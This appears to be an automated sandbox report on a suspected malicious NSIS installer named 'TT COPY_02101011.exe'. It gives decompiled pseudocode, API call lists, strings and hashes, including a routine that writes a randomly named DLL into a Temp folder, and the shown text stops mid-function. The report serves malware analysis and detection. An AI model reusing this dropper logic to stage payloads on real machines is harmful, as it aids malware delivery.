				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x575ac0
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x74
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040348f
0x00403498
0x0040349f
0x004034a1
0x004034b5
0x004034c7
0x004034d1
0x004034d6
0x004034dc
0x004034ef
0x004034ef
0x004034fa
0x004034a3
0x004034ae
0x004034ae
0x004034ff
0x00403504
0x00403509
0x00403512
0x0040351e
0x004035a5
0x004035ad
0x004035b6
0x004035b6
0x004035cc
0x004035d2
0x004035e0
0x0040366f
0x00403677
0x00403681
0x00403686
0x0040368c
0x0040370b
0x00403710
0x00403712
0x0040372e
0x00000000
0x0040372e
0x00403714
0x0040371a
0x00403722
0x00403722
0x00000000
0x0040371a
0x00403696
0x004036a7
0x004036a9
0x004036ab
0x004036b2
0x004036b2
0x004036ba
0x004036c2
0x004036c4
0x004036c6
0x004036cf
0x004036d2
0x004036d8
0x004036d8
0x004036de
0x004036f7
0x00403701
0x00000000
0x00403706
0x00403679
0x0040367b
0x00000000
0x004035e6
0x004035e6
0x004035ec
0x004035f6
0x004035fe
0x00403608
0x0040360e
0x0040361c
0x00403733
0x00403733
0x00000000
0x00403733
0x00403622
0x0040362b
0x0040366a
0x00000000
0x0040366a
0x00403524
0x00403524
0x00403529
0x00000000
0x00000000
0x0040352e
0x00403533
0x00403543
0x00403548
0x0040354f
0x00000000
0x00000000
0x00403553
0x00403555
0x00403562
0x00403562
0x0040356a
0x00403570
0x00403598
0x004035a0
0x00000000
0x00403582
0x00403583
0x0040358c
0x00403592
0x00403593
0x00000000
0x00403593
0x0040358e
0x00403590
0x00000000
0x00000000
0x00000000
0x00403590
0x00403570

APIs

Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77

lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
lstrlenA.KERNEL32(tduolivt,?,?,?,tduolivt,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\TT COPY_02101011.exe" ), ref: 00403565
lstrcmpiA.KERNEL32(?,.exe,tduolivt,?,?,?,tduolivt,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
GetFileAttributesA.KERNEL32(tduolivt), ref: 00403583
LoadImageA.USER32 ref: 004035CC

Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896

RegisterClassA.USER32 ref: 00403613
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
CreateWindowExA.USER32 ref: 00403664
ShowWindow.USER32(00000005,00000000), ref: 00403696
LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
GetClassInfoA.USER32 ref: 004036C2
GetClassInfoA.USER32 ref: 004036CF
RegisterClassA.USER32 ref: 004036D8
DialogBoxParamA.USER32 ref: 004036F7

Strings

_Nb, xrefs: 00403622, 00403627
RichEd32, xrefs: 004036AD
.exe, xrefs: 00403572
C:\Users\user\AppData\Local\Temp\, xrefs: 0040348D
RichEdit20A, xrefs: 004036BA, 004036C0
RichEd20, xrefs: 004036A2
"C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 00403495
C:\Users\user\AppData\Local\Temp, xrefs: 00403509, 00403511, 0040359F, 004035A5, 004035B5
.DEFAULT\Control Panel\International, xrefs: 004034E5
RichEdit, xrefs: 004036C9
1033, xrefs: 004034A9, 004034F5
Control Panel\Desktop\ResourceLocale, xrefs: 004034BD
tduolivt, xrefs: 00403533, 0040353B, 00403548, 00403592, 00403598

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$tduolivt
API String ID: 914957316-895661971
Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E0040592B("C:\\Users\\jones\\Desktop", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x8200
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0x4b8ef
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0x4b8f3
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c13
0x00402c16
0x00402c19
0x00402c1c
0x00402c22
0x00402c33
0x00402c38
0x00402c4b
0x00402c50
0x00402c53
0x00402c59
0x00000000
0x00402c5b
0x00402c66
0x00402c6c
0x00402c7d
0x00402c84
0x00402c8a
0x00402c8c
0x00402c91
0x00402c93
0x00402d80
0x00402d82
0x00402d87
0x00402d8e
0x00000000
0x00000000
0x00402d90
0x00402d93
0x00402db7
0x00402dbc
0x00402dc2
0x00402dc4
0x00402dcd
0x00402dd2
0x00402dd5
0x00402dd6
0x00402dd7
0x00402dd9
0x00402dde
0x00402de1
0x00402df4
0x00402df8
0x00402e00
0x00402e05
0x00402e07
0x00402e07
0x00402e07
0x00402e0f
0x00402e0f
0x00402e12
0x00402e13
0x00402e13
0x00402e16
0x00402e18
0x00402e18
0x00402e18
0x00402e22
0x00402e28
0x00402e36
0x00402e3b
0x00000000
0x00402e3b
0x00000000
0x00402de1
0x00402d9b
0x00402da6
0x00402dab
0x00402dad
0x00000000
0x00000000
0x00402db2
0x00402db5
0x00000000
0x00000000
0x00000000
0x00402c99
0x00402c9e
0x00402c9e
0x00402ca3
0x00402ca7
0x00402cae
0x00402cb3
0x00402cb5
0x00402cb7
0x00402cb7
0x00402cbb
0x00402cc0
0x00402cc2
0x00402dec
0x00402de3
0x00000000
0x00402de3
0x00402cc8
0x00402ccf
0x00402d4b
0x00402d4f
0x00402d53
0x00402d58
0x00000000
0x00402d4f
0x00402cd8
0x00402cdd
0x00402ce0
0x00402ce5
0x00000000
0x00000000
0x00402ce7
0x00402cee
0x00000000
0x00000000
0x00402cf0
0x00402cf7
0x00000000
0x00000000
0x00402cf9
0x00402d00
0x00000000
0x00000000
0x00402d02
0x00402d09
0x00000000
0x00000000
0x00402d0b
0x00402d11
0x00402d1a
0x00402d20
0x00402d23
0x00402d25
0x00402d2b
0x00000000
0x00000000
0x00402d31
0x00402d35
0x00402d3d
0x00402d3d
0x00402d40
0x00402d40
0x00402d43
0x00402d45
0x00402d47
0x00402d47
0x00000000
0x00402d45
0x00402d37
0x00402d3b
0x00000000
0x00000000
0x00000000
0x00402d59
0x00402d59
0x00402d5f
0x00402d6b
0x00402d6b
0x00402d6e
0x00402d74
0x00402d76
0x00402d76
0x00402d7e
0x00402d7e
0x00000000
0x00402d7e

APIs

GetTickCount.KERNEL32 ref: 00402C1C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TT COPY_02101011.exe,00000400), ref: 00402C38

Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405606
Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT COPY_02101011.exe,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00402C84

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
Inst, xrefs: 00402CF0
C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
Null, xrefs: 00402D02
C:\Users\user\Desktop\TT COPY_02101011.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
"C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 00402C15
Error launching installer, xrefs: 00402C5B
soft, xrefs: 00402CF9

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TT COPY_02101011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-773316782
Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\jones\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401869
0x0040186a
0x0040186b
0x0040186e
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,tduolivt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,tduolivt,tduolivt,00000000,00000000,tduolivt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,pewdd Setup,NSIS Error), ref: 00405938

Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85

Strings

C:\Users\user\AppData\Local\Temp\nshA78C.tmp, xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll, xrefs: 00401801, 0040181D
tduolivt, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nshA78C.tmp$C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll$tduolivt
API String ID: 1941528284-846125281
Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402E44, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x9777
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
